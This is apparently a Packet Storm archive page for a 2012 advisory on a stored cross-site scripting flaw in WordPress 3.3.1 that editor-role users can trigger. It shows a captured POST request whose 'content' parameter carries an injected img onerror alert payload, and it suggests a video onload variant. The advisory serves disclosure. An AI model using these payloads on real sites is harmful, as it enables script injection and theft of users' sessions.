what you don't know can hurt you

WordPress 3.3.1 Post-Auth Cross Site Scripting

WordPress 3.3.1 Post-Auth Cross Site Scripting
Posted Mar 11, 2012
Authored by HauntIT

WordPress version 3.3.1 suffers from a post authentication persistent cross site scripting vulnerability.

tags | exploit, xss
MD5 | f97613db45d66aad790bf73fb59b3407

WordPress 3.3.1 Post-Auth Cross Site Scripting

Change Mirror Download
# TITLE ....... # Wordpress 3.3.1 post-auth persistent XSS ............ #
# DATE ........ # 18.02.2012 .......................................... #
# AUTOHR ...... # http://hauntit.blogspot.com ......................... #
# SOFT LINK ... # http://wordpress.org ................................ #
# VERSION ..... # 1.0.0 ............................................... #
# TESTED ON ... # LAMP ................................................ #
# ..................................................................... #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)

# 2. What is the type of vulnerability?

This is standard persistent XSS for normal (registered) user (with 'editor' role).

"An attacker may exploit the html-injection issue to execute arbitrary script code
in the browser of an unsuspecting user in the context of the saffected site. This
may allow to steal cookie-based authentication credentials, control how the site
is displayed, and launch other attacks."

# 3. Where is bug :)
...cut from Burp...
POST /www/Wordpress/wordpress/wp-admin/post.php HTTP/1.1
(...)
content=qqqqqqqqqqqqqqqqqqqqqq"%2f%3e%3cimg%20src%3dx%20onerror%3dalert(123)%3e%3c
...cut from Burp...

By setting up 'content' parameter to value contains JS payload we can trigger XSS (add it
for other users in WP).

Payload to use for storing XSS could be tag 'video':
<video onload=<xss>>

# 4. More...

- http://www.wordpress.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

# Best regards
#

Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close